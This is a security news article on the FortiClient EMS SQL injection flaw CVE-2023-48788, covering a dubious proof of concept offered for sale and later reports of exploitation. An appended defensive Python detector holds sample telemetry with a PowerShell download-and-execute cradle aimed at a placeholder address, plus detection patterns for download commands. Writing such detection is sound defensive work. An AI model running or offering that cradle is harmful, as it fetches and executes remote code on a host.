Critical FortiClient EMS vulnerability fixed, (fake?) PoC for sale (CVE-2023-48788)

A recently fixed SQL injection vulnerability (CVE-2023-48788) in Fortinet’s FortiClient Endpoint Management Server (EMS) solution has apparently piqued the interest of many: Horizon3’s Attack Team means to publish technical details and a proof-of-concept exploit for it next week, and someone is attempting to sell a PoC for less than $300 via GitHub.

About CVE-2023-48788

CVE-2023-48788 is one of several vulnerabilities Fortinet recently patched.

“An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests,” the company’s product security incident response team pithily states in the associated advisory.

The team also shared that the vulnerability was “co-discovered and reported by Thiago Santana from Fortinet ForticlientEMS development team and UK NCSC”, but did not say whether it has been or is currently being exploited in attacks in the wild.

A PoC for CVE-2023-48788

As of Wednesday, someone has set up a GitHub page advertising a “new exploit” for CVE-2023-48788, and linked to a post on SatoshiDisk.com, a web-based platform where users can upload files they want to sell and other users can download them if they pay the set price.

[Image] PoC exploit for CVE-2023-48788 offered for sale

Here’s the thing, though: there’s no way to check if the PoC is real or fake before buying it. And we know that scammers and malware peddlers have been using this same pretext in the past to steal money and to deliver malware.

“I think the probability is low that the exploit sold by [this seller] is real. Currently, I do not see an exploit advertised anywhere else,” Dr. Johannes Ullrich, the founder of the SANS Internet Storm Center (ISC), told Help Net Security.

“On the other hand, if this is a relatively simple SQL injection issue, exploitation may not be that difficult, which could also explain the low price.”

He also noted that the vulnerability does not affect Fortinet gateway devices, but FortiClient EMS, instances of which are less likely to be reachable via the internet. According to sites like Shodan, there are only about a couple hundred systems currently exposed, he pointed out.

“At this point, I see almost no scans for Fortinet in [ISC’s] honeypots, and no actual exploit attempt, another indicator that there is no actual exploit widely available right now,” he concluded.

UPDATE (March 21, 2024, 10:50 a.m. ET):

Horizon3.ai has published a deep-dive into the vulnerability and a partial PoC exploit that triggers the SQL injection flaw but doesn’t enable remote code execution.

According to GreyNoise’s tag for CVE-2023-48788, exploitation attempts have yet to be spotted, but Fortinet has updated its security advisory, which now says that “this vulnerability is exploited in the wild.”

UPDATE (April 15, 2024, 04:20 a.m. ET):

Red Canary threat researchers have spotted CVE-2023-48788 being exploited by attackers.

“The exploit activity we observed followed a pattern that started with inbound external network connections to the FCMdaemon process and ended with attempts to download and execute RMM tools or PowerShell-based backdoors,” they said last week.
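As an added defender's example, not code from the article, Red Canary or Fortinet: a small Python correlator over constructed Windows telemetry that flags the pattern described above, an inbound connection to FCMdaemon from a non-private address followed within a few minutes by a PowerShell download cradle or an RMM binary launch on the same host. The event schema, the five-minute window, the download cues and the RMM binary names are assumptions to tune to your own EDR and firewall logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs). 203.0.113.0/24 is a documentation
# range standing in for an Internet address; ems02 is a benign internal case.
EVENTS = [
    {"ts": "2024-04-10T09:00:00", "host": "ems01", "type": "net", "image": "FCMdaemon.exe",
     "direction": "inbound", "src_ip": "203.0.113.7"},
    {"ts": "2024-04-10T09:00:20", "host": "ems01", "type": "proc", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.7/a.ps1')"},
    {"ts": "2024-04-10T09:10:00", "host": "ems02", "type": "net", "image": "FCMdaemon.exe",
     "direction": "inbound", "src_ip": "10.0.0.5"},
    {"ts": "2024-04-10T09:10:05", "host": "ems02", "type": "proc", "image": "powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]
# Assumed heuristics: download cues and RMM binary names; tune for your environment.
DOWNLOAD_CUES = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer"
                           r"|\biwr\b|\bcurl\b|-EncodedCommand|\s-e(nc)?\s", re.I)
RMM_BINARIES = {"anydesk.exe", "screenconnect.clientservice.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
WINDOW = timedelta(minutes=5)

def is_external(ip):
    """True unless the IPv4 address is RFC 1918 or loopback (deliberately simple)."""
    o = [int(x) for x in ip.split(".")]
    return not (o[0] in (10, 127) or (o[0] == 172 and 16 <= o[1] <= 31)
                or (o[0] == 192 and o[1] == 168))

def suspicious_exec(ev):
    """Process start that looks like 'download and execute' or an RMM tool launch."""
    img = ev["image"].lower()
    return img in RMM_BINARIES or (
        img in SHELLS and bool(DOWNLOAD_CUES.search(ev.get("cmdline", ""))))

def find_exploit_chains(events, window=WINDOW):
    """Return (host, external_src_ip, what_ran) for each external inbound hit on
    FCMdaemon followed within `window` by a suspicious execution on the same host."""
    hits, inbound = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if (ev["type"] == "net" and ev["image"].lower() == "fcmdaemon.exe"
                and ev["direction"] == "inbound" and is_external(ev["src_ip"])):
            inbound.setdefault(ev["host"], []).append((t, ev["src_ip"]))
        elif ev["type"] == "proc" and suspicious_exec(ev):
            for t0, src in inbound.get(ev["host"], []):
                if timedelta(0) <= t - t0 <= window:
                    hits.append((ev["host"], src, ev.get("cmdline") or ev["image"]))
    return hits
```

Running `find_exploit_chains(EVENTS)` returns one hit for ems01 and none for ems02, since the ems02 connection came from a private address and its PowerShell command carried no download cue.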
